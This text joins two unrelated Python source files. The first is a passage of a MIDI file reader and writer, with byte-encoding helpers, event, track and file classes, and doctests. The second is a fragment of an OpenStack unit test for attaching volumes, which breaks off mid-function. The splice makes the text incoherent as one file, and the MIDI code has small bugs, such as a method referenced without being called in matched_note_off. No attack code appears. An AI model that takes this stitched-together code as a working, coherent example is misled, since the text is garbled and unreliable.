    This is necessary as DeltaTime times are given with variable size,
    and thus may be if different numbers of characters are used.
    (The ellipses below are just to make the doctests work on both Python 2 and
    Python 3 (where the output is in bytes).)

    >>> get_variable_length_number('A-u')
    (65, ...'-u')
    >>> get_variable_length_number('-u')
    (45, ...'u')
    >>> get_variable_length_number('u')
    (117, ...'')
    >>> get_variable_length_number('test')
    (116, ...'est')
    >>> get_variable_length_number('E@-E')
    (69, ...'@-E')
    >>> get_variable_length_number('@-E')
    (64, ...'-E')
    >>> get_variable_length_number('-E')
    (45, ...'E')
    >>> get_variable_length_number('E')
    (69, ...'')

    Test that variable length characters work:
    >>> get_variable_length_number(b'\xff\x7f')
    (16383, ...'')
    >>> get_variable_length_number('中xy')
    (210638584, ...'y')

    If no low-byte character is encoded, raises an IndexError
    >>> get_variable_length_number('中国')
    Traceback (most recent call last):
    MidiException: did not find the end of the number!
    '''
    # from http://faydoc.tripod.com/formats/mid.htm
    # This allows the number to be read one byte at a time, and when you see
    # a msb of 0, you know that it was the last (least significant) byte of the number.
    summation = 0
    if isinstance(midi_str, str):
        midi_str = midi_str.encode('utf-8')

    for i, byte in enumerate(midi_str):
        if not is_num(byte):
            byte = ord(byte)
        summation = (summation << 7) + (byte & 0x7F)
        if not byte & 0x80:
            try:
                return summation, midi_str[i+1:]
            except IndexError:
                break
    raise MidiException('did not find the end of the number!')

def get_numbers_as_list(midi_str):
    '''
    Translate each char into a number, return in a list.
    Used for reading data messages where each byte encodes
    a different discrete value.

    >>> get_numbers_as_list('\\x00\\x00\\x00\\x03')
    [0, 0, 0, 3]
    '''
    post = []
    for item in midi_str:
        if is_num(item):
            post.append(item)
        else:
            post.append(ord(item))
    return post

def put_number(num, length):
    '''
    Put a single number as a hex number at the end of a string `length` bytes long.

    >>> put_number(3, 4)
    b'\\x00\\x00\\x00\\x03'
    >>> put_number(0, 1)
    b'\\x00'
    '''
    lst = bytearray()

    for i in range(length):
        shift_bits = 8 * (length - 1 - i)
        this_num = (num >> shift_bits) & 0xFF
        lst.append(this_num)
    return bytes(lst)

def put_variable_length_number(num):
    '''
    >>> put_variable_length_number(4)
    b'\\x04'
    >>> put_variable_length_number(127)
    b'\\x7f'
    >>> put_variable_length_number(0)
    b'\\x00'
    >>> put_variable_length_number(1024)
    b'\\x88\\x00'
    >>> put_variable_length_number(8192)
    b'\\xc0\\x00'
    >>> put_variable_length_number(16383)
    b'\\xff\\x7f'
    >>> put_variable_length_number(-1)
    Traceback (most recent call last):
    MidiException: cannot put_variable_length_number() when number is negative: -1
    '''
    if num < 0:
        raise MidiException(
            'cannot put_variable_length_number() when number is negative: %s' % num)
    lst = bytearray()
    while True:
        result, num = num & 0x7F, num >> 7
        lst.append(result + 0x80)
        if num == 0:
            break
    lst.reverse()
    lst[-1] = lst[-1] & 0x7f
    return bytes(lst)

def put_numbers_as_list(num_list):
    '''
    Translate a list of numbers (0-255) into a bytestring.
    Used for encoding data messages where each byte encodes a different discrete value.

    >>> put_numbers_as_list([0, 0, 0, 3])
    b'\\x00\\x00\\x00\\x03'

    If a number is < 0 then it wraps around from the top.
    >>> put_numbers_as_list([0, 0, 0, -3])
    b'\\x00\\x00\\x00\\xfd'
    >>> put_numbers_as_list([0, 0, 0, -1])
    b'\\x00\\x00\\x00\\xff'

    A number > 255 is an exception:
    >>> put_numbers_as_list([256])
    Traceback (most recent call last):
    MidiException: Cannot place a number > 255 in a list: 256
    '''
    post = bytearray()
    for num in num_list:
        if num < 0:
            num = num % 256 # -1 will be 255
        if num >= 256:
            raise MidiException("Cannot place a number > 255 in a list: %d" % num)
        post.append(num)
    return bytes(post)

#-------------------------------------------------------------------------------
class Enumeration(object):
    '''
    Utility object for defining binary MIDI message constants.
    '''
    def __init__(self, enum_list=None):
        if enum_list is None:
            enum_list = []
        lookup = {}
        reverse_lookup = {}
        num = 0
        unique_names = []
        unique_values = []
        for enum in enum_list:
            if isinstance(enum, tuple):
                enum, num = enum
            if not isinstance(enum, str):
                raise EnumerationException("enum name is not a string: " + enum)
            if not isinstance(num, int):
                raise EnumerationException("enum value is not an integer: " + num)
            if enum in unique_names:
                raise EnumerationException("enum name is not unique: " + enum)
            if num in unique_values:
                raise EnumerationException("enum value is not unique for " + enum)
            unique_names.append(enum)
            unique_values.append(num)
            lookup[enum] = num
            reverse_lookup[num] = enum
            num = num + 1
        self.lookup = lookup
        self.reverse_lookup = reverse_lookup

    def __add__(self, other):
        lst = []
        for k in self.lookup:
            lst.append((k, self.lookup[k]))
        for k in other.lookup:
            lst.append((k, other.lookup[k]))
        return Enumeration(lst)

    def hasattr(self, attr):
        if attr in self.lookup:
            return True
        return False

    def has_value(self, attr):
        if attr in self.reverse_lookup:
            return True
        return False

    def __getattr__(self, attr):
        if attr not in self.lookup:
            raise AttributeError
        return self.lookup[attr]

    def whatis(self, value):
        post = self.reverse_lookup[value]
        return post

CHANNEL_VOICE_MESSAGES = Enumeration([
    ("NOTE_OFF", 0x80),
    ("NOTE_ON", 0x90),
    ("POLYPHONIC_KEY_PRESSURE", 0xA0),
    ("CONTROLLER_CHANGE", 0xB0),
    ("PROGRAM_CHANGE", 0xC0),
    ("CHANNEL_KEY_PRESSURE", 0xD0),
    ("PITCH_BEND", 0xE0)])

CHANNEL_MODE_MESSAGES = Enumeration([
    ("ALL_SOUND_OFF", 0x78),
    ("RESET_ALL_CONTROLLERS", 0x79),
    ("LOCAL_CONTROL", 0x7A),
    ("ALL_NOTES_OFF", 0x7B),
    ("OMNI_MODE_OFF", 0x7C),
    ("OMNI_MODE_ON", 0x7D),
    ("MONO_MODE_ON", 0x7E),
    ("POLY_MODE_ON", 0x7F)])

META_EVENTS = Enumeration([
    ("SEQUENCE_NUMBER", 0x00),
    ("TEXT_EVENT", 0x01),
    ("COPYRIGHT_NOTICE", 0x02),
    ("SEQUENCE_TRACK_NAME", 0x03),
    ("INSTRUMENT_NAME", 0x04),
    ("LYRIC", 0x05),
    ("MARKER", 0x06),
    ("CUE_POINT", 0x07),
    ("PROGRAM_NAME", 0x08),
    # optional event is used to embed the
    # patch/program name that is called up by the immediately
    # subsequent Bank Select and Program Change messages.
    # It serves to aid the end user in making an intelligent
    #  program choice when using different hardware.
    ("SOUND_SET_UNSUPPORTED", 0x09),
    ("MIDI_CHANNEL_PREFIX", 0x20),
    ("MIDI_PORT", 0x21),
    ("END_OF_TRACK", 0x2F),
    ("SET_TEMPO", 0x51),
    ("SMTPE_OFFSET", 0x54),
    ("TIME_SIGNATURE", 0x58),
    ("KEY_SIGNATURE", 0x59),
    ("SEQUENCER_SPECIFIC_META_EVENT", 0x7F)])

#-------------------------------------------------------------------------------
class MidiEvent(object):
    '''
    A model of a MIDI event, including note-on, note-off, program change,
    controller change, any many others.
    MidiEvent objects are paired (preceded) by :class:`~base.DeltaTime`
    objects in the list of events in a MidiTrack object.
    The `track` argument must be a :class:`~base.MidiTrack` object.
    The `type_` attribute is a string representation of a Midi event from the CHANNEL_VOICE_MESSAGES
    or META_EVENTS definitions.
    The `channel` attribute is an integer channel id, from 1 to 16.
    The `time` attribute is an integer duration of the event in ticks. This value
    can be zero. This value is not essential, as ultimate time positioning is
    determined by :class:`~base.DeltaTime` objects.
    The `pitch` attribute is only defined for note-on and note-off messages.
    The attribute stores an integer representation (0-127, with 60 = middle C).
    The `velocity` attribute is only defined for note-on and note-off messages.
    The attribute stores an integer representation (0-127).  A note-on message with
    velocity 0 is generally assumed to be the same as a note-off message.
    The `data` attribute is used for storing other messages,
    such as SEQUENCE_TRACK_NAME string values.

    >>> mt = MidiTrack(1)
    >>> me1 = MidiEvent(mt)
    >>> me1.type_ = "NOTE_ON"
    >>> me1.channel = 3
    >>> me1.time = 200
    >>> me1.pitch = 60
    >>> me1.velocity = 120
    >>> me1
    <MidiEvent NOTE_ON, t=200, track=1, channel=3, pitch=60, velocity=120>
    >>> me2 = MidiEvent(mt)
    >>> me2.type_ = "SEQUENCE_TRACK_NAME"
    >>> me2.time = 0
    >>> me2.data = 'guitar'
    >>> me2
    <MidiEvent SEQUENCE_TRACK_NAME, t=0, track=1, channel=None, data=b'guitar'>
    '''
    def __init__(self, track, type_=None, time=None, channel=None):
        self.track = track
        self.type_ = type_
        self.time = time
        self.channel = channel

        self._parameter1 = None # pitch or first data value
        self._parameter2 = None # velocity or second data value

        # data is a property...

        # if this is a Note on/off, need to store original
        # pitch space value in order to determine if this is has a microtone
        self.cent_shift = None

        # store a reference to a corresponding event
        # if a noteOn, store the note off, and vice versa
        # NTODO: We should make sure that we garbage collect this -- otherwise it's a memory
        # leak from a circular reference.
        # note: that's what weak references are for
        # unimplemented
        self.corresponding_event = None

        # store and pass on a running status if found
        self.last_status_byte = None

        self.sort_order = 0
        self.update_sort_order()

    def update_sort_order(self):
        if self.type_ == 'PITCH_BEND':
            self.sort_order = -10
        if self.type_ == 'NOTE_OFF':
            self.sort_order = -20

    def __repr__(self):
        if self.track is None:
            track_index = None
        else:
            track_index = self.track.index

        return_str = ("<MidiEvent %s, t=%s, track=%s, channel=%s" %
             (self.type_, repr(self.time), track_index,
              repr(self.channel)))
        if self.type_ in ['NOTE_ON', 'NOTE_OFF']:
            attr_list = ["pitch", "velocity"]
        else:
            if self._parameter2 is None:
                attr_list = ['data']
            else:
                attr_list = ['_parameter1', '_parameter2']

        for attrib in attr_list:
            if getattr(self, attrib) is not None:
                return_str = return_str + ", " + attrib + "=" + repr(getattr(self, attrib))
        return return_str + ">"

    def _set_pitch(self, value):
        self._parameter1 = value

    def _get_pitch(self):
        if self.type_ in ['NOTE_ON', 'NOTE_OFF']:
            return self._parameter1
        else:
            return None

    pitch = property(_get_pitch, _set_pitch)

    def _set_velocity(self, value):
        self._parameter2 = value

    def _get_velocity(self):
        return self._parameter2

    velocity = property(_get_velocity, _set_velocity)

    def _set_data(self, value):
        if value is not None and not isinstance(value, bytes):
            if isinstance(value, str):
                value = value.encode('utf-8')
        self._parameter1 = value

    def _get_data(self):
        return self._parameter1

    data = property(_get_data, _set_data)

    def set_pitch_bend(self, cents, bend_range=2):
        '''
        Treat this event as a pitch bend value, and set the ._parameter1 and
         ._parameter2 fields appropriately given a specified bend value in cents.

        The `bend_range` parameter gives the number of half steps in the bend range.

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.set_pitch_bend(50)
        >>> me1._parameter1, me1._parameter2
        (0, 80)
        >>> me1.set_pitch_bend(100)
        >>> me1._parameter1, me1._parameter2
        (0, 96)
        >>> me1.set_pitch_bend(200)
        >>> me1._parameter1, me1._parameter2
        (127, 127)
        >>> me1.set_pitch_bend(-50)
        >>> me1._parameter1, me1._parameter2
        (0, 48)
        >>> me1.set_pitch_bend(-100)
        >>> me1._parameter1, me1._parameter2
        (0, 32)
        '''
        # value range is 0, 16383
        # center should be 8192
        cent_range = bend_range * 100
        center = 8192
        top_span = 16383 - center
        bottom_span = center

        if cents > 0:
            shift_scalar = cents / float(cent_range)
            shift = int(round(shift_scalar * top_span))
        elif cents < 0:
            shift_scalar = cents / float(cent_range) # will be negative
            shift = int(round(shift_scalar * bottom_span)) # will be negative
        else:
            shift = 0
        target = center + shift

        # produce a two-char value
        char_value = put_variable_length_number(target)
        data1, _ = get_number(char_value[0], 1)
        # need to convert from 8 bit to 7, so using & 0x7F
        data1 = data1 & 0x7F
        if len(char_value) > 1:
            data2, _ = get_number(char_value[1], 1)
            data2 = data2 & 0x7F
        else:
            data2 = 0

        self._parameter1 = data2
        self._parameter2 = data1 # data1 is msb here

    def _parse_channel_voice_message(self, midi_str):
        '''

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> remainder = me1._parse_channel_voice_message(ints_to_hex_string([144, 60, 120]))
        >>> me1.channel
        1
        >>> remainder = me1._parse_channel_voice_message(ints_to_hex_string([145, 60, 120]))
        >>> me1.channel
        2
        >>> me1.type_
        'NOTE_ON'
        >>> me1.pitch
        60
        >>> me1.velocity
        120
        '''
        # first_byte, channel_number, and second_byte define
        # characteristics of the first two chars
        # for first_byte: The left nybble (4 bits) contains the actual command, and the right nibble
        # contains the midi channel number on which the command will be executed.
        if is_num(midi_str[0]):
            first_byte = midi_str[0]
        else:
            first_byte = ord(midi_str[0])
        channel_number = first_byte & 0xF0
        if is_num(midi_str[1]):
            second_byte = midi_str[1]
        else:
            second_byte = ord(midi_str[1])
        if is_num(midi_str[2]):
            third_byte = midi_str[2]
        else:
            third_byte = ord(midi_str[2])

        self.channel = (first_byte & 0x0F) + 1
        self.type_ = CHANNEL_VOICE_MESSAGES.whatis(channel_number)
        if (self.type_ == "PROGRAM_CHANGE" or
                self.type_ == "CHANNEL_KEY_PRESSURE"):
            self.data = second_byte
            return midi_str[2:]
        elif self.type_ == "CONTROLLER_CHANGE":
            # for now, do nothing with this data
            # for a note, str[2] is velocity; here, it is the control value
            self.pitch = second_byte # this is the controller id
            self.velocity = third_byte # this is the controller value
            return midi_str[3:]
        else:
            self.pitch = second_byte
            self.velocity = third_byte
            return midi_str[3:]

    def read(self, time, midi_str):
        '''
        Parse the string that is given and take the beginning
        section and convert it into data for this event and return the
        now truncated string.
        The `time` value is the number of ticks into the Track
        at which this event happens. This is derived from reading
        data the level of the track.
        TODO: These instructions are inadequate.
        >>> # all note-on messages (144-159) can be found
        >>> 145 & 0xF0 # testing message type_ extraction
        144
        >>> 146 & 0xF0 # testing message type_ extraction
        144
        >>> (144 & 0x0F) + 1 # getting the channel
        1
        >>> (159 & 0x0F) + 1 # getting the channel
        16
        '''
        if len(midi_str) < 2:
            # often what we have here are null events:
            # the string is simply: 0x00
            print(
                'MidiEvent.read(): got bad data string',
                'time',
                time,
                'str',
                repr(midi_str))
            return ''

        # first_byte, message_type, and second_byte define
        # characteristics of the first two chars
        # for first_byte: The left nybble (4 bits) contains the
        # actual command, and the right nibble
        # contains the midi channel number on which the command will
        # be executed.
        if is_num(midi_str[0]):
            first_byte = midi_str[0]
        else:
            first_byte = ord(midi_str[0])

        # detect running status: if the status byte is less than 128, its
        # not a status byte, but a data byte
        if first_byte < 128:
            if self.last_status_byte is not None:
                rsb = self.last_status_byte
                if is_num(rsb):
                    rsb = bytes([rsb])
            else:
                rsb = bytes([0x90])
            # add the running status byte to the front of the string
            # and process as before
            midi_str = rsb + midi_str
            if is_num(midi_str[0]):
                first_byte = midi_str[0]
            else:
                first_byte = ord(midi_str[0])
        else:
            self.last_status_byte = midi_str[0]

        message_type = first_byte & 0xF0

        if is_num(midi_str[1]):
            second_byte = midi_str[1]
        else:
            second_byte = ord(midi_str[1])

        if CHANNEL_VOICE_MESSAGES.has_value(message_type):
            return self._parse_channel_voice_message(midi_str)

        elif message_type == 0xB0 and CHANNEL_MODE_MESSAGES.has_value(second_byte):
            self.channel = (first_byte & 0x0F) + 1
            self.type_ = CHANNEL_MODE_MESSAGES.whatis(second_byte)
            if self.type_ == "LOCAL_CONTROL":
                self.data = (ord(midi_str[2]) == 0x7F)
            elif self.type_ == "MONO_MODE_ON":
                self.data = ord(midi_str[2])
            else:
                print('unhandled message:', midi_str[2])
            return midi_str[3:]

        elif first_byte == 0xF0 or first_byte == 0xF7:
            self.type_ = {0xF0: "F0_SYSEX_EVENT",
                         0xF7: "F7_SYSEX_EVENT"}[first_byte]
            length, midi_str = get_variable_length_number(midi_str[1:])
            self.data = midi_str[:length]
            return midi_str[length:]

        # SEQUENCE_TRACK_NAME and other MetaEvents are here
        elif first_byte == 0xFF:
            if not META_EVENTS.has_value(second_byte):
                print("unknown meta event: FF %02X" % second_byte)
                sys.stdout.flush()
                raise MidiException("Unknown midi event type_: %r, %r" % (first_byte, second_byte))
            self.type_ = META_EVENTS.whatis(second_byte)
            length, midi_str = get_variable_length_number(midi_str[2:])
            self.data = midi_str[:length]
            return midi_str[length:]
        else:
            # an uncaught message
            print(
                'got unknown midi event type_',
                repr(first_byte),
                'char_to_binary(midi_str[0])',
                char_to_binary(midi_str[0]),
                'char_to_binary(midi_str[1])',
                char_to_binary(midi_str[1]))
            raise MidiException("Unknown midi event type_")


    def get_bytes(self):
        '''
        Return a set of bytes for this MIDI event.
        '''
        sysex_event_dict = {"F0_SYSEX_EVENT": 0xF0,
                            "F7_SYSEX_EVENT": 0xF7}
        if CHANNEL_VOICE_MESSAGES.hasattr(self.type_):
            return_bytes = chr((self.channel - 1) +
                    getattr(CHANNEL_VOICE_MESSAGES, self.type_))
            # for writing note-on/note-off
            if self.type_ not in [
                    'PROGRAM_CHANGE', 'CHANNEL_KEY_PRESSURE']:
                # this results in a two-part string, like '\x00\x00'
                try:
                    data = chr(self._parameter1) + chr(self._parameter2)
                except ValueError:
                    raise MidiException(
                        "Problem with representing either %d or %d" % (
                            self._parameter1, self._parameter2))
            elif self.type_ in ['PROGRAM_CHANGE']:
                try:
                    data = chr(self.data)
                except TypeError:
                    raise MidiException(
                        "Got incorrect data for %return_bytes in .data: %return_bytes," %
                            (self, self.data) + "cannot parse Program Change")
            else:
                try:
                    data = chr(self.data)
                except TypeError:
                    raise MidiException(
                        ("Got incorrect data for %return_bytes in "
                         ".data: %return_bytes, ") % (self, self.data) +
                        "cannot parse Miscellaneous Message")
            return return_bytes + data

        elif CHANNEL_MODE_MESSAGES.hasattr(self.type_):
            return_bytes = getattr(CHANNEL_MODE_MESSAGES, self.type_)
            return_bytes = (chr(0xB0 + (self.channel - 1)) +
                 chr(return_bytes) +
                 chr(self.data))
            return return_bytes

        elif self.type_ in sysex_event_dict:
            return_bytes = bytes([sysex_event_dict[self.type_]])
            return_bytes = return_bytes + put_variable_length_number(len(self.data))
            return return_bytes + self.data

        elif META_EVENTS.hasattr(self.type_):
            return_bytes = bytes([0xFF]) + bytes([getattr(META_EVENTS, self.type_)])
            return_bytes = return_bytes + put_variable_length_number(len(self.data))

            try:
                return return_bytes + self.data
            except (UnicodeDecodeError, TypeError):
                return return_bytes + unicodedata.normalize(
                    'NFKD', self.data).encode('ascii', 'ignore')
        else:
            raise MidiException("unknown midi event type_: %return_bytes" % self.type_)

    #---------------------------------------------------------------------------
    def is_note_on(self):
        '''
        return a boolean if this is a NOTE_ON message and velocity is not zero_

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.type_ = "NOTE_ON"
        >>> me1.velocity = 120
        >>> me1.is_note_on()
        True
        >>> me1.is_note_off()
        False
        '''
        return self.type_ == "NOTE_ON" and self.velocity != 0

    def is_note_off(self):
        '''
        Return a boolean if this is should be interpreted as a note-off message,
        either as a real note-off or as a note-on with zero velocity.

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.type_ = "NOTE_OFF"
        >>> me1.is_note_on()
        False
        >>> me1.is_note_off()
        True
        >>> me2 = MidiEvent(mt)
        >>> me2.type_ = "NOTE_ON"
        >>> me2.velocity = 0
        >>> me2.is_note_on()
        False
        >>> me2.is_note_off()
        True
        '''
        if self.type_ == "NOTE_OFF":
            return True
        elif self.type_ == "NOTE_ON" and self.velocity == 0:
            return True
        return False

    def is_delta_time(self):
        '''
        Return a boolean if this is a DeltaTime subclass.

        >>> mt = MidiTrack(1)
        >>> dt = DeltaTime(mt)
        >>> dt.is_delta_time()
        True
        '''
        if self.type_ == "DeltaTime":
            return True
        return False

    def matched_note_off(self, other):
        '''
        Returns True if `other` is a MIDI event that specifies
        a note-off message for this message.  That is, this event
        is a NOTE_ON message, and the other is a NOTE_OFF message
        for this pitch on this channel.  Otherwise returns False

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.type_ = "NOTE_ON"
        >>> me1.velocity = 120
        >>> me1.pitch = 60
        >>> me2 = MidiEvent(mt)
        >>> me2.type_ = "NOTE_ON"
        >>> me2.velocity = 0
        >>> me2.pitch = 60
        >>> me1.matched_note_off(me2)
        True
        >>> me2.pitch = 61
        >>> me1.matched_note_off(me2)
        False
        >>> me2.type_ = "NOTE_OFF"
        >>> me1.matched_note_off(me2)
        False
        >>> me2.pitch = 60
        >>> me1.matched_note_off(me2)
        True
        >>> me2.channel = 12
        >>> me1.matched_note_off(me2)
        False
        '''
        if other.is_note_off:
            # might check velocity here too?
            if self.pitch == other.pitch and self.channel == other.channel:
                return True
        return False

class DeltaTime(MidiEvent):
    '''
    A :class:`~base.MidiEvent` subclass that stores the
    time change (in ticks) since the start or since the last MidiEvent.
    Pairs of DeltaTime and MidiEvent objects are the basic presentation of temporal data.
    The `track` argument must be a :class:`~base.MidiTrack` object.
    Time values are in integers, representing ticks.
    The `channel` attribute, inherited from MidiEvent is not used and set to None
    unless overridden (don't!).

    >>> mt = MidiTrack(1)
    >>> dt = DeltaTime(mt)
    >>> dt.time = 380
    >>> dt
    <MidiEvent DeltaTime, t=380, track=1, channel=None>
    '''
    def __init__(self, track, time=None, channel=None):
        MidiEvent.__init__(self, track, time=time, channel=channel)
        self.type_ = "DeltaTime"

    def read(self, oldstr):
        self.time, newstr = get_variable_length_number(oldstr)
        return self.time, newstr

    def get_bytes(self):
        midi_str = put_variable_length_number(self.time)
        return midi_str

class MidiTrack(object):
    '''
    A MIDI Track. Each track contains a list of
    :class:`~base.MidiChannel` objects, one for each channel.
    All events are stored in the `events` list, in order.
    An `index` is an integer identifier for this object.
    TODO: Better Docs

    >>> mt = MidiTrack(0)

    '''
    def __init__(self, index):
        self.index = index
        self.events = []
        self.length = 0 #the data length; only used on read()

    def read(self, midi_str):
        '''
        Read as much of the string (representing midi data) as necessary;
        return the remaining string for reassignment and further processing.
        The string should begin with `MTrk`, specifying a Midi Track
        Creates and stores :class:`~base.DeltaTime`
        and :class:`~base.MidiEvent` objects.
        '''
        time = 0 # a running counter of ticks

        if not midi_str[:4] == b"MTrk":
            raise MidiException('badly formed midi string: missing leading MTrk')
        # get the 4 chars after the MTrk encoding
        length, midi_str = get_number(midi_str[4:], 4)
        self.length = length

        # all event data is in the track str
        track_str = midi_str[:length]
        remainder = midi_str[length:]

        e_previous = None
        while track_str:
            # shave off the time stamp from the event
            delta_t = DeltaTime(self)
            # return extracted time, as well as remaining string
            d_time, track_str_candidate = delta_t.read(track_str)
            # this is the offset that this event happens at, in ticks
            time_candidate = time + d_time

            # pass self to event, set this MidiTrack as the track for this event
            event = MidiEvent(self)
            if e_previous is not None: # set the last status byte
                event.last_status_byte = e_previous.last_status_byte
            # some midi events may raise errors; simply skip for now
            try:
                track_str_candidate = event.read(time_candidate, track_str_candidate)
            except MidiException:
                # assume that track_str, after delta extraction, is still correct
                # set to result after taking delta time
                track_str = track_str_candidate
                continue
            # only set after trying to read, which may raise exception
            time = time_candidate
            track_str = track_str_candidate # remainder string
            # only append if we get this far
            self.events.append(delta_t)
            self.events.append(event)
            e_previous = event

        return remainder # remainder string after extracting track data

    def get_bytes(self):
        '''
        returns a string of midi-data from the `.events` in the object.
        '''
        # build str using MidiEvents
        midi_str = b""
        for event in self.events:
            # this writes both delta time and message events
            try:
                event_bytes = event.get_bytes()
                int_array = []
                for byte in event_bytes:
                    if is_num(byte):
                        int_array.append(byte)
                    else:
                        int_array.append(ord(byte))
                event_bytes = bytes(bytearray(int_array))
                midi_str = midi_str + event_bytes
            except MidiException as err:
                print("Conversion error for %s: %s; ignored." % (event, err))
        return b"MTrk" + put_number(len(midi_str), 4) + midi_str

    def __repr__(self):
        return_str = "<MidiTrack %d -- %d events\n" % (self.index, len(self.events))
        for event in self.events:
            return_str = return_str + "    " + event.__repr__() + "\n"
        return return_str + "  >"

    #---------------------------------------------------------------------------
    def update_events(self):
        '''
        We may attach events to this track before setting their `track` parameter.
        This method will move through all events and set their track to this track.
        '''
        for event in self.events:
            event.track = self

    def has_notes(self):
        '''Return True/False if this track has any note-on/note-off pairs defined.
        '''
        for event in self.events:
            if event.is_note_on():
                return True
        return False

    def set_channel(self, value):
        '''Set the channel of all events in this Track.
        '''
        if value not in range(1, 17):
            raise MidiException('bad channel value: %s' % value)
        for event in self.events:
            event.channel = value

    def get_channels(self):
        '''Get all channels used in this Track.
        '''
        post = []
        for event in self.events:
            if event.channel not in post:
                post.append(event.channel)
        return post

    def get_program_changes(self):
        '''Get all unique program changes used in this Track, sorted.
        '''
        post = []
        for event in self.events:
            if event.type_ == 'PROGRAM_CHANGE':
                if event.data not in post:
                    post.append(event.data)
        return post

class MidiFile(object):
    '''
    Low-level MIDI file writing, emulating methods from normal Python files.
    The `ticks_per_quarter_note` attribute must be set before writing. 1024 is a common value.
    This object is returned by some properties for directly writing files of midi representations.
    '''

    def __init__(self):
        self.file = None
        self.format = 1
        self.tracks = []
        self.ticks_per_quarter_note = 1024
        self.ticks_per_second = None

    def open(self, filename, attrib="rb"):
        '''
        Open a MIDI file path for reading or writing.

        For writing to a MIDI file, `attrib` should be "wb".
        '''
        if attrib not in ['rb', 'wb']:
            raise MidiException('cannot read or write unless in binary mode, not:', attrib)
        self.file = open(filename, attrib)

    def open_file_like(self, file_like):
        '''Assign a file-like object, such as those provided by StringIO, as an open file object.
        >>> from io import StringIO
        >>> fileLikeOpen = StringIO()
        >>> mf = MidiFile()
        >>> mf.open_file_like(fileLikeOpen)
        >>> mf.close()
        '''
        self.file = file_like

    def __repr__(self):
        return_str = "<MidiFile %d tracks\n" % len(self.tracks)
        for track in self.tracks:
            return_str = return_str + "  " + track.__repr__() + "\n"
        return return_str + ">"

    def close(self):
        '''
        Close the file.
        '''
        self.file.close()

    def read(self):
        '''
        Read and parse MIDI data stored in a file.
        '''
        self.readstr(self.file.read())

    def readstr(self, midi_str):
        '''
        Read and parse MIDI data as a string, putting the
        data in `.ticks_per_quarter_note` and a list of
        `MidiTrack` objects in the attribute `.tracks`.
        '''
        if not midi_str[:4] == b"MThd":
            raise MidiException('badly formated midi string, got: %s' % midi_str[:20])

        # we step through the str src, chopping off characters as we go
        # and reassigning to str
        length, midi_str = get_number(midi_str[4:], 4)
        if length != 6:
            raise MidiException('badly formated midi string')

        midi_format_type, midi_str = get_number(midi_str, 2)
        self.format = midi_format_type
        if midi_format_type not in (0, 1):
            raise MidiException('cannot handle midi file format: %s' % format)

        num_tracks, midi_str = get_number(midi_str, 2)
        division, midi_str = get_number(midi_str, 2)

        # very few midi files seem to define ticks_per_second
        if division & 0x8000:
            frames_per_second = -((division >> 8) | -128)
            ticks_per_frame = division & 0xFF
            if ticks_per_frame not in [24, 25, 29, 30]:
                raise MidiException('cannot handle ticks per frame: %s' % ticks_per_frame)
            if ticks_per_frame == 29:
                ticks_per_frame = 30  # drop frame
            self.ticks_per_second = ticks_per_frame * frames_per_second
        else:
            self.ticks_per_quarter_note = division & 0x7FFF

        for i in range(num_tracks):
            trk = MidiTrack(i) # sets the MidiTrack index parameters
            midi_str = trk.read(midi_str) # pass all the remaining string, reassing
            self.tracks.append(trk)

    def write(self):
        '''
        Write MIDI data as a file to the file opened with `.open()`.
        '''
        self.file.write(self.writestr())

    def writestr(self):
        '''
        generate the midi data header and convert the list of
        midi_track objects in self_tracks into midi data and return it as a string_
        '''
        midi_str = self.write_m_thd_str()
        for trk in self.tracks:
            midi_str = midi_str + trk.get_bytes()
        return midi_str

    def write_m_thd_str(self):
        '''
        convert the information in self_ticks_per_quarter_note
        into midi data header and return it as a string_'''
        division = self.ticks_per_quarter_note
        # Don't handle ticks_per_second yet, too confusing
        if (division & 0x8000) != 0:
            raise MidiException(
                'Cannot write midi string unless self.ticks_per_quarter_note is a multiple of 1024')
        midi_str = b"MThd" + put_number(6, 4) + put_number(self.format, 2)
        midi_str = midi_str + put_number(len(self.tracks), 2)
        midi_str = midi_str + put_number(division, 2)
        return midi_str

if __name__ == "__main__":
    import doctest
    doctest.testmod(optionflags=doctest.ELLIPSIS)

# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.


import testtools

import openstack.cloud
from openstack.cloud import meta
from openstack.tests import fakes
from openstack.tests.unit import base


class TestVolume(base.TestCase):

    def test_attach_volume(self):
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        rattach = {'server_id': server['id'], 'device': 'device001',
                   'volumeId': volume['id'], 'id': 'attachmentId'}
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 json={'volumeAttachment': rattach},
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})
                 )])
        ret = self.cloud.attach_volume(server, volume, wait=False)
        self.assertEqual(rattach, ret)
        self.assert_calls()

    def test_attach_volume_exception(self):
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 status_code=404,
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})
                 )])
        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudURINotFound,
            "Error attaching volume %s to server %s" % (
                volume['id'], server['id'])
        ):
            self.cloud.attach_volume(server, volume, wait=False)
        self.assert_calls()

    def test_attach_volume_wait(self):
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        vol['attachments'] = [{'server_id': server['id'],
                               'device': 'device001'}]
        vol['status'] = 'attached'
